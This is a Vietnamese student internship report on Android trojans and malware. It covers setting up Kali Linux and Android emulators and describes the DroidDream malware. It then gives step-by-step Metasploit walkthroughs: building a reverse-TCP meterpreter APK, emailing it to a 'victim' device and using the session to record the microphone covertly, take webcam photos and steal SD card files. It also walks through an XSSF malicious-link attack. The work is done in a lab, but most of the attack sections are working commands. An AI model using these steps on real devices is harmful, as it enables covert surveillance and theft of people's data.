SlideShare a Scribd company logo
1 of 43
Download to read offline
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 1 
BÁO CÁO ĐỀ TÀI THỰC TẬP 
ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP, SẮP XẾP DỮ LIỆU NHƯ DANH BẠ, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI. 
GIÁO VIÊN HƯỚNG DẪN: THẦY VÕ ĐỖ THẮNG 
SINH VIÊN THỰC HIỆN: PHAN LÝ TRÚC ANH 
BÁO CÁO GIỮA KÌ (17/08/2014)
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 2 
Nội dung: 
1. Tên đề tài: Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài. 
2. Yêu cầu: 
 Phần 1: Thực hiện đối với mạng LAN (có kết nối wifi) 
1.1 Nghiên cứu hệ điều hành Kali Linux. Cài đặt Kali Linux (hoặc Back Track) 
1.2 Nghiên cứu cơ chế tạo mã độc trên Kali Linux nói riêng và Android nói chung. 
1.3 Nghiên cứu cách tích hợp mã độc vào các phần mềm và quảng bá qua mạng xã hội. 
1.4 Thực hiện khai thác data trong thẻ sd card, camera của smartphone. 
 Phần 2: Thực hiện trên môi trường Virtual Private Server – VPS (server có internet) 
2.1 Cài đặt autosploit trên VPS 
2.2 Tạo mã độc trên VPS 
2.3 Cho phép xâm nhập vào android1, android2, android3… gửi data từ các android về VPS
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 3 
MỤC LỤC
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 4 
I – KALI LINUX VÀ CÁCH CÀI ĐẶT MÁY ẢO KALI LINUX TRÊN VMWARE WORKSTATION 
 Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Kali Linux phát triển trên nền tảng hệ điều hành Debian, khả năng tương thích với kiến trúc ARM được cải tiến, nó hỗ trợ mạng không dây tốt hơn, có khả năng tùy biến cao và dễ dàng nâng cấp giữa các phiên bản Kali trong trương lai. 
 Các bước để tạo một máy áo chạy Kali Linux trên phần mềm VMware workstation. 
1. Chuẩn bị: 
- Máy tính được cài đặt phầm mềm VMware workstation. Ở đây ta sẽ dùng VMware workstation 10.0.0 
- Download file ISO hệ điều hành Kali Linux 64 bit phiên bản 1.0.7 trên link www.kali.org/downloads 
2. Tiến trình: 
Bước 1: Khởi động VMware. Vào File > New Virtual Machine… (hoặc Ctrl+N) 
Bước 2: Chọn Type là Custom (advanced) > Next 
Bước 3: Yêu cầu file để cài đặt máy ảo, ta sẽ chọn I will install the operating system later > Next
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 5 
Bước 4: Chọn hệ thống là Linux, Version là Debian 7 64-bit > Next 
Bước 5: Chọn vùng lưu máy ảo và đặt tên máy ảo là Debian 7 64 > Next
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 6 
Bước 6: Cấu hình bộ xử lý là mặc định > Next 
Bước 7: Chọn bộ nhớ RAM là 512MB > Next. Lưu ý là phải phù hợp với máy thật)
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 7 
Bước 8: Chọn loại Network là Bridged networking > Next 
Bước 9: Cấp phát ổ đĩa cho máy ảo. Ta cấp phát Maximum là 15GB. Chọn Store virtual disk as a single file > Next
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 8 
Bước 10: Ta sẽ trỏ file ISO vào máy ảo vừa tạo. Click chuột phải vào tên máy ảo Debian 7 64 > Settings 
Trỏ dòng CD/DVD (IDE) > phần Connection > Use ISO image file > Ta dẫn đến file Kali Linux 64 bit.ISO 
Bước 11: Máy ảo được khởi chạy. Tại Boot menu > Chọn Graphical install
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 9 
Bước 12: Ta chọn Language, Location, Keyboard > Continue 
Bước 13: Sau đó ta phải cấu hình Network > đặt Hostname > đặt Domain name > Continue 
Bước 14: Tạo Users name và Password > Continue. Bước nay khá quan trọng, root password là mật khẩu để bạn đăng nhập vào máy ảo Debian 7 64
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
10 
Bước 15: Cấu hình Clock > Next 
Bước 16: Phân vùng ổ đĩa > ta để mặc định Guided – use entire disk > Continue 
Khi xuất hiện yêu cầu Write the changes to disk? > chọn Yes > Continue 
Đợi Install System
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
11 
Bước 17: Cấu hình Package manager > Xuất hiện yêu cầu Use the network mirror? > chọn No > Continue 
Bước 18: Cài đặt GRUB boot loader > Install the GRUB boot loader to the master boot record? > chọn Yes > Continue 
Bước 19: Ta đợi tiến trình cài đặt hoàn tất > Finish the Installation > Continue 
Bước 20: Sau khi hoàn tất, máy ảo Debian 7 64 sẽ tự khởi động. Ta đăng nhập với User là root và Password đã đặt.
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
12 
II – NGHIÊN CỨU MALWARE, TROJAN VÀ CƠ CHẾ TẠO MÃ ĐỘC TRÊN ANDROID 
1. Khái niệm Malware, Trojan: 
- Malware - Malicious Sofware có nghĩa là bất kỳ phần mềm máy tính độc hại nào đó được tạo nên với ý định xâm nhập làm hại máy tính, thu thập thông tin, truy cập dữ liệu nhạy cảm… mà người sử dụng không hề hay biết. Malware bao gồm virus, worm, trojan horse, adware, spyware, keyloger, backdoor, rootkit… 
- Trojan - Trojan Horse gọi là phần mềm gián điệp. Nó là một chương trình phần mềm độc hại mà không cố gắng để tự tái tạo, thay vào đó nó sẽ được cài đặt vào hệ thống của người dùng bằng cách giả vờ là một chương trình phần mềm hợp pháp. 
- Hiện nay, malware chỉ xâm nhập vào máy tính và đánh cắp thông tin người dùng, nó chưa có cơ chế lây lan. Cách thức hoạt động của malware giống như trojan chứ không như virus phá hủy. 
- Đơn giản là malware và trojan giúp tin tặc truy cập vào máy người dùng, điều khiển từ xa, thu thập thông tin người dùng… 
2. Cơ chế hoạt động của Malware: 
Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware DroidDream. Malware này hoạt động qua 2 giai đoạn: 
- Giai đoạn 1: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên.
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
13 
- Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một khi DroidDream chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai, DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. 
Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các công việc của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình. 
Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều hành này. 
3. Cơ chế hoạt động của Trojan: 
- Trojan có nhiều loại nhưng phổ biến là 2 loại: Trojan dùng để điều khiển và Trojan dùng để đánh cắp mật khẩu. 
- Bước đầu cơ chế hoạt động của cả 2 loại này là giống nhau. Máy tính sẽ bị nhiễm trojan qua tập tin đính kèm của thư điện tử, chương trình trò chơi, chương trình nào đó mà bạn vô tình chạy thử. Nó sẽ tự sao chép vào nơi nào đó trong máy tính. Sau đó nó bắt đầu ghi vào registry của máy các thông số đề nó có thễ tự động khởi chạy khi máy tính khởi động. 
- Tiếp theo, đối với trojan điều khiển nó sẽ cho phép tin tặc từ xa nắm quyền điều khiển máy tính. Còn đối với trojan đánh cắp mật khẩu, nó lưu mật khẩu của người dùng vào 1 file và tự động gửi mail đến tin tặc khi máy tính kết nối mạng.
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
14 
III – MÁY ẢO ANDROID VIRTUAL DEVICE – CÁCH TẠO MÁY ẢO QUA PHẦN MỀM ECLIPSE 
 Phần mềm Eclipse có chức năng Android Virtual Device cho phép ta tạo máy ảo chạy android (có thể là smartphone, tablet…) 
 Thông qua các máy ảo này ta có thể nghiên cứu cách tích hợp mã độc vào thiết bị chạy android 
1. Các Tools cần thiết để cài đặt: 
- Phần mềm Eclipse 
- Bộ Java SE Development Kit 
- Android Developer Tools 
- Android SDK 
- Bộ công cụ Android Debug Bridge ADB 
- Các ứng dụng cơ bản cho Android 
2. Tải và cài đặt JDK – Java SE Development Kit: 
Bước 1: Tải JDK tại http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads- 1880260.html 
Click chọn “Accept License Agreement” 
Chọn phiên bản phù hợp với máy tính. Ở đây ta chọn Windows x64
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
15 
Bước 2: Sauk hi tải về, ta tiến hành cài đặt như nhiều phần mềm khác qua các lựa chọn Next. Cuối cùng click Close 
Bước 3: Để kiểm tra lại việc cài đặt JDK. Ta mở cmd.exe 
Gõ lệnh “java <Enter>”
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
16 
3. Tải về Eclipse Android Developer Tools và Android SDK: 
Lưu ý khi ta tải về bộ này, sẽ gồm cả phần mềm Eclipse 
Bước 1: Tải về tại link http://developer.android.com/sdk/index.html 
Click vào I have read and agree… và chọn phiên bản 64-bit 
Click Download 
Bước 2: Giải nén file vừa tải về. Chạy SDK Manager.exe 
Lưu ý là có thể gặp lỗi Fetching https://dl-sll... Failed to fetch… Close thông báo này lại. 
Xuất hiển cửa sổ Choose Packages to Install. Nếu cửa sổ này rỗng > Cancel 
Quay về cửa sổ Android SDK and AVD manager > Settings > Tick vào ô Force https://... 
Nếu không bị lỗi này, thì sẽ xuất hiện cửa sổ Android SDK Manager 
Ta chọn các Packages muốn cài. Và Install
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
17 
Bước 3: Tại cửa sổ Choose Packages to Install > Tick vào Accept License > Install > Chờ hoàn tất
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
18 
4. Tích hợp Android SDK vào Eclipse: 
Sau khi có phần mềm Eclipse và bộ Android SDK, ta cần tích hợp lại để sử dụng 
Bước 1: Mở eclipse.exe trong thư mục giải nén file Eclipse Android Developer Tools và Android SDK đã tải ở trên 
D: Softadt-bundle-windows-x86_64-20140702eclipseeclipse.exe 
Bước 2: Vào Help > Install new software… > Add 
> Name: gõ tên tool muốn đặt 
> Location: gõ địa chỉ tải về ADT 
https://dl.google.com/android/eclipse 
hoặc https://dl-ssl.google.com/android/eclipse 
> OK 
Bước 3: Ở cửa sổ Name > Tick vào Developer Tools 
Bước 4: Chọn các Next > Next > Accept > Next > Finish – Run in Background 
Bước 5: Vào Windows > Preferences > Android > Browse > Chỉ đường dẫn thư mục Android SDK đã tải > Apply > OK
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
19 
Bước 6: Khởi đông lại Eclipse 
5. Tạo máy ảo chạy Android trên phần mềm Eclipse: 
Android Virtual Device là máy ảo cho developer phát triển ứng dụng. 
Sau đây là các bước tạo 1 AVD trên Eclipse 
Bước 1: Mở eclipse.exe > Vào Windows > Android Virtual Device Manager > 
Bước 2: Thiết đặt các thông số cần thiết: 
Name: Đặt tên cho thiết bị
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
20 
Device: Chọn loại thiết bị bạn muốn tạo 
Target: Chọn phiên bản hệ điều hành 
Skin: chọn kích cỡ màn hình bạn muốn, thường thì phải phù hợp với Device đã chọn ở trên 
SDcard: chọn thẻ nhớ ảo cho AVD. 
Bước 3: Click OK để tạo máy ảo. 
Khởi chạy bằng nút Start… > Launch 
Bước 4: Chờ hoàn tất, ta được máy ảo chạy Android
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
21 
IV – MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION THÔNG QUA VIRTUALBOX 
 Phần mềm Genymotion và VirtualBox cho phép ta tạo máy ảo chạy android (có thể là smartphone, tablet…). 
 Thông qua các máy ảo này ta có thể nghiên cứu cách tích hợp mã độc vào thiết bị chạy android. 
1. Các Tools cần thiết để cài đặt: 
- Phần mềm Virtual Box. 
- Phần mềm Genymotion. 
- Bộ công cụ phát triển Java SE Development Kit. 
- Bộ công cụ Android SDK Manager. 
2. Tải và cài đặt JDK (Java SE Development Kit) và Android SDK Manager: 
Phần tải và cài đặt đã được hướng dẫn và thực hiện ở mục III của Báo cáo này. 
3. Tải về và cài đặt phần mềm tạo máy ảo VirtualBox: 
Ta có thể bản VirtualBox phù hợp với máy của bạn. 
- Bước 1: Ta tải về file cài đặt VirtualBox tại trang: 
http://www.oracle.com/technetwork/server- storage/virtualbox/downloads/index.html 
Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác:
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
22 
Bước 3: Next > Next > Next > Install > Finish 
Bước 4: Giao diện phần mềm sau khi cài đặt xong.
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
23 
4. Tải về và cài đặt ứng dụng Genymotion: 
Bước 1: Trước khi bắt đầu, ta cần có 1 tài khoản trên web www.genymotion.com 
Ta có thể đăng ký miễn phí và tải Genymotion về máy. 
Bước 2: Bắt đầu cài đặt phần mềm Genymotion. Ta lựa chọn ngôn ngữ cài đặt > OK > Next 
Bước 3: Chọn thư mục lưu cài đặt. 
Bước 4: Next > Next > Install > Finish
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
24 
Bước 5: Mở Genymotion vừa cài đặt xong. Ta vào thiết đặt 1 số thông số ở mục Settings 
Bước 6: Nhập Username và Password mà bạn đã đăng ký trên web www.genymotion.com ở thẻ General 
Bước 7: Ở thẻ ADB > chọn Use custom Android SDK tools > Browser đường dẫn đến thư mục sdk trong thư mục mà ta đã tải Android SDK Manager. Sau đó lưu lại cài đặt. 
F: Softadt-bundle-windows-x86_64-20140702sdk
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
25 
5. Tạo máy ảo chạy Android trên Genymotion kết hợp VirtualBox: 
Bước 1: Ta mở Genymotion lên để tạo máy ảo. Vào Add 
Bước 2: Chọn tên thiết bị mà muốn làm máy ảo. 
Xuất hiện cấu hình máy ảo sắp tạo:
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
26 
Bước 3: Next > Đợi máy ảo tự động tải về từ web và Finish quá trình tạo máy ảo. 
Bước 4: Để khởi động máy ảo vừa tạo ta chọn máy ảo > Play
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
27 
Bước 5: Giao diện máy ảo Google Nexus 7 vừa tạo thành công.
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
28 
V – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID: 
1. Các công cụ cần thiết: 
Để thực hiện tạo mã độc và tấn công vào thiết bị Android ta cần chuẩn bị: 
- Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm). 
- Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo tablet chạy Android 4.3. 
- Cả 2 thiết bị đều có thể kết nối mạng. 
- Có tài khoản email để gửi và nhận file trên cả 2 thiết bị. 
2. Tiến trình: 
Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android. 
Thiết đặt card mạng cho máy tấn công Kali để đảm bảo kết nối được internet. 
Vào Edit > Virtual Network Editor… 
Tại VMnet0 > Chọn Type là Bridged > Chọn card mạng của máy thật ở ô Bridged to.
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
29 
Bước 3: Kiểm tra IP của máy tấn công Kali bằng lệnh : “ifconfig” 
Bước 4: Tạo 1 file chứa mã độc và gửi cho thiết bị Android. Ở đây ta tạo file ứng dụng *.apk và gửi qua email.
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
30 
Nhập lệnh: “msfpayload android/meterpreter/reverse_tcp lhost=<địa chỉ IP máy tấn công> lport=<địa chỉ port> R > <địa chỉ lưu lại> / <tên file>” 
Ví dụ lệnh là: msfpayload android/meterpreter/reverse_tcp lhost=192.168.149.136 lport=8080 R > /root/Desktop/appsX.apk. 
- Tạo ứng dụng ReverseTCP có trên file là appsX.apk. 
- Địa chỉ IP máy tấn công là 192.168.149.136. 
- Địa chỉ Port là 8080 (Lưu ý tránh sử dụng các port thông dụng từ 0 đến 1023). 
- Lưu file tại Desktop. 
Bước 5: Khởi động ứng dụng Metasploit trên máy tấn công Kali bằng lệnh: “msfconsole” 
Bước 6: Sau đó ta set các payload, lhost, lport bằng các lệnh: 
“set payload android/meterpreter/reverse_tcp” 
“set lhost 192.168.149.136” 
“set lport 8080”
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
31 
Bước 7: Thực hiện lệnh “exploit” để bắt đầu quá trình tấn công. 
Bước 8: Tại thiết bị Android, sau khi tải về và cài đặt file appsX.apk, ta được ứng dụng MainActivity. Khởi động lên và nhấp vào ReverseTCP.
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
32 
Khi đó trên Kali ta nhận được thông báo có thiết bị truy cập vào làm nạn nhân. 
Bước 9: Dùng lệnh “help” để liệt kê các lệnh mà ta có thể thực hiện được.
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
33 
3. Khai thác thông tin hê thống: 
Xem thông tin hệ thống bằng lệnh “sysinfo”. 
4. Ghi âm lén: 
Ghi âm lén ở thiết bị nạn nhân Android và lưu về máy tấn công Kali bằng lệnh “record_mic”. 
File ghi âm được là xLijsRbg.wav lưu tự động ở /root của máy Kali. 
5. Khai thác webcam và chụp ảnh lén: 
Kiểm tra danh sách webcam của thiết bị nạn nhân Android và thực hiện chụp ảnh lén, lưu về máy tấn công Kali bằng lệnh “webcam_list” và “webcam_snap <mã webcam>”.
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
34 
File ảnh chụp được là FRumITki.jpeg lưu tự động ở /root của máy Kali . 
6. Khai thác file hệ thống của máy nạn nhân: 
Kiểm tra các file hệ thống đang hoạt động bằng lệnh “ps”.
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
35 
7. Khai thác dữ liệu từ SDCARD: 
Di chuyển vào bộ nhớ SDCARD bằng lệnh “cd /sdcard”. 
Dùng lệnh “ls” để liệt kê danh sách các thư mục/tập tin có trong SDCARD. 
Xem các tập tin mà máy nạn nhân đã tải về qua lệnh di chuyển thư muc “cd Download” và lệnh liệt kê “ls”. 
Đánh cắp và tải về tập tin bất kì bằng lệnh “download <tên tập tin>”. 
Ở đây dùng lệnh “download appsX.apk”. 
Tập tin appsX.apk vừa đánh cắp về được lưu tự động trong /root của máy tấn công Kali. 
8. Kết thúc tấn công: 
Dùng lệnh “exit” để thoát khỏi Metasploit và kết thúc quá trình tấn công.
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
36 
VI – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC: 
1. Các công cụ cần thiết: 
Để tấn công vào thiết bị Android thông qua liên kết chứa mã độc ta cũng cần chuẩn bị như tấn công bằng file mã độc ở trên: 
- Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm). 
- Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo tablet chạy Android 4.3. 
- Cả 2 thiết bị đều có thể kết nối mạng. 
- Có tài khoản email để gửi và nhận thông tin liên kết trên cả 2 thiết bị. 
2. Tiến trình: 
Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android. 
Bước 2: Ở máy Kali > Mở Terminal > thực hiện 3 lệnh sau để cập nhật Framework 
“msfupdate” 
“cd /opt/metasploit/apps/pro/msf3” 
“svn export http://xssf.googlecode.com/svn/trunk/ ./ --force” 
Bước 3: Khởi động Metasploit bằng lệnh “msfconsole”
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
37 
Bước 4: Vào XSSF bằng lệnh “load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose” 
Bước 5: Thực hiện lệnh “xssf_urls” 
Ta nhận được các urls (đường dẫn web http) như của XSSF Server, XSSF test page, XSSF logs page…
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
38 
Bước 6: Cho máy nạn nhân truy cập vào đường dẫn XSSF test page: http://192.168.149.136:80/xssf/test.html 
Ta nhận được thông báo trên máy tấn công Kali: 
3. Kiểm tra số lượng nạn nhân đang truy cập vào đường dẫn mã độc: 
Ta dùng lệnh “xssf_victims” để kiểm tra số lượng nạn nhân truy cập vào đường dẫn mã độc http://192.168.149.136:80/xssf/test.html 
4. Xem thông tin về nạn nhân đang truy cập: 
Dùng lệnh “xssf_information <ID máy nạn nhân>” 
Ở đây ví dụ là “xssf_information 1”
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
39 
5. Khai thác dữ liệu từ máy nạn nhân: 
 Đầu tiên ta dùng lệnh “search auxiliary/xssf” để kiểm tra các quyền mà ta có thể thao tác lên máy nạn nhân 
 Gửi Thông báo XSSF đến máy nạn nhân qua lệnh: 
“use auxiliary/xssf/public/misc/alert” 
“run”
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
40 
Ở máy nạn nhân sẽ nhận được cảnh báo XSSF 
Thoát ra msf bằng lệnh “Ctrl+C” > “back” 
 Kiểm tra xem nạn nhân có truy cập vào các trang web thông dụng hay không bằng lệnh: 
“use auxiliary/xssf/public/misc/visited_pages” 
“run” 
 Cài đặt 1 đường dẫn mới và qua đó kiểm tra thông tin máy nạn nhân lần nữa: 
“use auxiliary/gather/android_htmlfileprovider” 
“set SRVPORT 87” 
“set URIPATH /” 
“run”
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
41 
Chờ nạn nhân truy cập vào đường dẫn mới http://192.168.149.136:87/ 
Ta nhận được thông tin máy nạn nhân: 
6. Thoát khỏi XSSF của Metasploit: 
Để thoát khỏi ta thực hiện các lệnh: “Ctrl + C” > “back” > “exit” > “exit”
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
42 
VII – BÁO CÁO TUẦN VÀ VIDEO QUÁ TRÌNH 
1. Link báo cáo tuần: 
http://www.slideshare.net/phanconghien/tuan1 
http://www.slideshare.net/phanconghien/tuan2 
http://www.slideshare.net/phanconghien/tuan3-4 
2. Link video quá trình thực hiện: 
- Cài đặt Kali Linux trên VMware: http://youtu.be/90e-w3SGJnY 
- Tạo máy ảo Android Virtual Device trên Eclipse: http://youtu.be/7p9_0ojdmqs 
- Tạo máy ảo Android trên Genymotion và VirtualBox: http://youtu.be/DkxtthrNb9o 
- Tạo mã độc trên Kali Linux và tấn công vào máy ảo Android: http://youtu.be/iEawr1JupZ8 
- Tạo mã độc trên trang web bằng XSSF: http://youtu.be/1Jw8F_H0Jz4 
- Clip Giới thiệu bản thân: http://youtu.be/iRfXCEXI9lo
BÁO CÁO THỰC TẬP 
August 16, 2014 
Page 
43 
VIII – NGUỒN THAM KHẢO 
http://sinhvienit.net/forum 
www.kali.org/downloads 
http://forum.bkav.com.vn 
http://vi.wikipedia.org/wiki 
http://developer.android.com/sdk/index.html#download 
http://www.oracle.com/technetwork/java/javase/downloads 
http://choimobile.vn/forums/#thao-luan-hdh-android.62 
http://www.oracle.com/technetwork/server- storage/virtualbox/downloads/index.html 
http://www.genymotion.com/ 
http://www.whitehat.vn/threads/ 
Giáo trình khóa học System Hacking – Trung tâm đào tạo ATHENA – www.Athena.Edu.Vn

More Related Content

What's hot

Chiến lược kinh doanh cho Công ty Liên doanh thiết bị viễn thông
 Chiến lược  kinh  doanh cho Công ty Liên doanh thiết bị viễn thông Chiến lược  kinh  doanh cho Công ty Liên doanh thiết bị viễn thông
Chiến lược kinh doanh cho Công ty Liên doanh thiết bị viễn thôngluanvantrust
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongVu Trung Kien
 
คู่มือ Handbook app inventor
คู่มือ Handbook app inventorคู่มือ Handbook app inventor
คู่มือ Handbook app inventorAreefin Kareng
 
CƠ CHẾ QUẢN LÝ VỐN TẬP TRUNG TẠI NGÂN HÀNG ĐẦU TƯ VÀ PHÁT TRIỂN VIỆT NAM
CƠ CHẾ QUẢN LÝ VỐN TẬP TRUNG TẠI NGÂN HÀNG ĐẦU TƯ VÀ PHÁT TRIỂN VIỆT NAMCƠ CHẾ QUẢN LÝ VỐN TẬP TRUNG TẠI NGÂN HÀNG ĐẦU TƯ VÀ PHÁT TRIỂN VIỆT NAM
CƠ CHẾ QUẢN LÝ VỐN TẬP TRUNG TẠI NGÂN HÀNG ĐẦU TƯ VÀ PHÁT TRIỂN VIỆT NAMMan_Ebook
 
Slide đồ án kiểm thử PM
Slide đồ án kiểm thử PMSlide đồ án kiểm thử PM
Slide đồ án kiểm thử PMNguyễn Anh
 
Chứng Từ Xuất Nhập Khẩu
Chứng Từ Xuất Nhập KhẩuChứng Từ Xuất Nhập Khẩu
Chứng Từ Xuất Nhập KhẩuLuan Nguyen
 
Đề tài: Cửa hàng kem tươi “ice-cream” Thương hiệu Kem Tổng hợp Thế giới - Wor...
Đề tài: Cửa hàng kem tươi “ice-cream” Thương hiệu Kem Tổng hợp Thế giới - Wor...Đề tài: Cửa hàng kem tươi “ice-cream” Thương hiệu Kem Tổng hợp Thế giới - Wor...
Đề tài: Cửa hàng kem tươi “ice-cream” Thương hiệu Kem Tổng hợp Thế giới - Wor...Viết thuê trọn gói ZALO 0934573149
 
Hướng dẫn xây dựng ma trận trong quản trị chiến lược
Hướng dẫn xây dựng ma trận trong quản trị chiến lượcHướng dẫn xây dựng ma trận trong quản trị chiến lược
Hướng dẫn xây dựng ma trận trong quản trị chiến lượcTran Jade
 
Tối ưu hoá công cụ tìm kiếm (SEO) cho báo điện tử
Tối ưu hoá công cụ tìm kiếm (SEO) cho báo điện tửTối ưu hoá công cụ tìm kiếm (SEO) cho báo điện tử
Tối ưu hoá công cụ tìm kiếm (SEO) cho báo điện tửluanvantrust
 
KrDAG 스터디: 라즈베리파이2와 Beacon의만남
KrDAG 스터디: 라즈베리파이2와 Beacon의만남KrDAG 스터디: 라즈베리파이2와 Beacon의만남
KrDAG 스터디: 라즈베리파이2와 Beacon의만남Ian Choi
 
Hadoop - Hệ thống tính toán và xử lý dữ liệu lớn
Hadoop - Hệ thống tính toán và xử lý dữ liệu lớnHadoop - Hệ thống tính toán và xử lý dữ liệu lớn
Hadoop - Hệ thống tính toán và xử lý dữ liệu lớnThành Thư Thái
 
DỰ ÁN MỞ TIỆM BÁNH MISSU BARKEY.docx
DỰ ÁN MỞ TIỆM BÁNH MISSU BARKEY.docxDỰ ÁN MỞ TIỆM BÁNH MISSU BARKEY.docx
DỰ ÁN MỞ TIỆM BÁNH MISSU BARKEY.docxTuynThanh413696
 
CÁC CÂU HỎI CỦA KHÁCH DÀNH CHO FORWARDER (KHÁCH HÀNG HÀNG NHẬP)_ Advantage Lo...
CÁC CÂU HỎI CỦA KHÁCH DÀNH CHO FORWARDER (KHÁCH HÀNG HÀNG NHẬP)_ Advantage Lo...CÁC CÂU HỎI CỦA KHÁCH DÀNH CHO FORWARDER (KHÁCH HÀNG HÀNG NHẬP)_ Advantage Lo...
CÁC CÂU HỎI CỦA KHÁCH DÀNH CHO FORWARDER (KHÁCH HÀNG HÀNG NHẬP)_ Advantage Lo...Advantage Logistics
 
Bao cao tttn an ninh web
Bao cao tttn   an ninh webBao cao tttn   an ninh web
Bao cao tttn an ninh webNhóc Mèo
 
Phân tích swot của cty vinamilk
Phân tích swot của cty vinamilkPhân tích swot của cty vinamilk
Phân tích swot của cty vinamilknguyenhoa1991
 

What's hot (20)

Chiến lược kinh doanh cho Công ty Liên doanh thiết bị viễn thông
 Chiến lược  kinh  doanh cho Công ty Liên doanh thiết bị viễn thông Chiến lược  kinh  doanh cho Công ty Liên doanh thiết bị viễn thông
Chiến lược kinh doanh cho Công ty Liên doanh thiết bị viễn thông
 
Đề tài: Xây dựng dự án đầu tư “Cửa hàng bánh ngọt – “HOMEMADE NA’S CAKE”
Đề tài: Xây dựng dự án đầu tư “Cửa hàng bánh ngọt – “HOMEMADE NA’S CAKE”Đề tài: Xây dựng dự án đầu tư “Cửa hàng bánh ngọt – “HOMEMADE NA’S CAKE”
Đề tài: Xây dựng dự án đầu tư “Cửa hàng bánh ngọt – “HOMEMADE NA’S CAKE”
 
Tim hieu lo hong web va cach phong chong
